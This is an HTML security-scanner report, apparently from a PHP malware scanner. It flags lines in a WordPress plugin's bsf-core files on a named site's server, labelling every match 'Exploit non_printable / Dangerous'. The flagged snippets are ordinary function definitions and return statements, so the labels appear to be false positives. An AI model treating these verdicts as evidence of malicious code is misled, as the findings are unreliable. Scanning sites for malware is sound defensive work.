<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_current_name</span><span style="color: #007700">( </span><span style="color: #0000BB">$template</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 209</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_notices' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 215</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_notices</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$token</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_update_all_product_version' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_theme_deactivation' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_theme_deactivation</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 346</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_free_menu_position' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 354</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_free_menu_position</span><span style="color: #007700">( </span><span style="color: #0000BB">$start</span><span style="color: #007700">, </span><span style="color: #0000BB">$increment </span><span style="color: #007700">= </span><span style="color: #0000BB">0.3 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 360</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$start</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 371</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_option' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 375</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">complete option data </span><span style="color: #007700">OR </span><span style="color: #0000BB">a single variable</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 376</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 378</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$request </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 381</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return ( isset( </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">[ </span><span style="color: #0000BB">$request </span><span style="color: #007700">] ) ) ? </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">[ </span><span style="color: #0000BB">$request </span><span style="color: #007700">] : </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 387</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_update_option' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 395</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$request</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 398</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">update_option</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_options'</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_options </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_all_product_version</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 402</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_sort' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 410</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_sort</span><span style="color: #007700">( </span><span style="color: #0000BB">$a</span><span style="color: #007700">, </span><span style="color: #0000BB">$b </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 411</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strcmp</span><span style="color: #007700">( </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">( </span><span style="color: #0000BB">$a</span><span style="color: #007700">-></span><span style="color: #0000BB">short_name </span><span style="color: #007700">), </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">( </span><span style="color: #0000BB">$b</span><span style="color: #007700">-></span><span style="color: #0000BB">short_name </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_generate_rand_token' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_497").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/auto-update/updater.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.07 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_498" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">-></span><span style="color: #0000BB">updated_versions</span><span style="color: #007700">; } else { return </span><span style="color: #0000BB">$result</span><span style="color: #007700">-></span><span style="color: #0000BB">error</span><span style="color: #007700">; } } } } } if ( ! </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_check_product_update' </span><span style="color: #007700">) ) { function </span><span style="color: #0000BB">bsf_check_product_update</span><span style="color: #007700">() { </span><span style="color: #0000BB">$is_update </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">; </span><span style="color: #0000BB">$registered </span><span style="color: #007700">= array(); </span><span style="color: #0000BB">$all_products </span><span style="color: #007700">= </span><span style="color: #0000BB">brainstorm_get_all_products</span><span style="color: #007700">( </span><span style="color: #0000BB">false</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_remote_version</span><span style="color: #007700">( </span><span style="color: #0000BB">$products </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">-></span><span style="color: #0000BB">updated_versions</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">-></span><span style="color: #0000BB">error</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_check_product_update' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_check_product_update</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">wp_remote_get</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_remote_version' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_498").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.14 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 76</span><br><table id="file_499" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_send_json_success</span><span style="color: #007700">( </span><span style="color: #0000BB">$data </span><span style="color: #007700">); } </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_ajax_bsf_envato_redirect_url'</span><span style="color: #007700">, </span><span style="color: #DD0000">'bsf_envato_redirect_url_callback' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 107</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'register_bsf_extension_page' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_bsf_extension_page</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 122</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'_bsf_maybe_add_dashboard_menu' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 130</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true </span><span style="color: #007700">- If </span><span style="color: #0000BB">menu is to be shown </span><span style="color: #007700">| </span><span style="color: #0000BB">false </span><span style="color: #007700">- if </span><span style="color: #0000BB">menu is not to be displayed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_bsf_maybe_add_dashboard_menu</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 140</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 169</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 197</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'register_bsf_extension_page_network' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 201</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_bsf_extension_page_network</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 219</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_extensions_callback' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 223</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_extensions_callback</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 228</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_extract_product_id' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 234</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_extract_product_id</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_extract_product_id'</span><span style="color: #007700">, </span><span style="color: #0000BB">$id</span><span style="color: #007700">, </span><span style="color: #0000BB">$path </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions</span><span style="color: #007700">.</span><span style="color: #0000BB">file_get_contents_file_get_contents</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 260</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'init_bsf_core' </span><span style="color: #007700">) ) {</span>
</span>
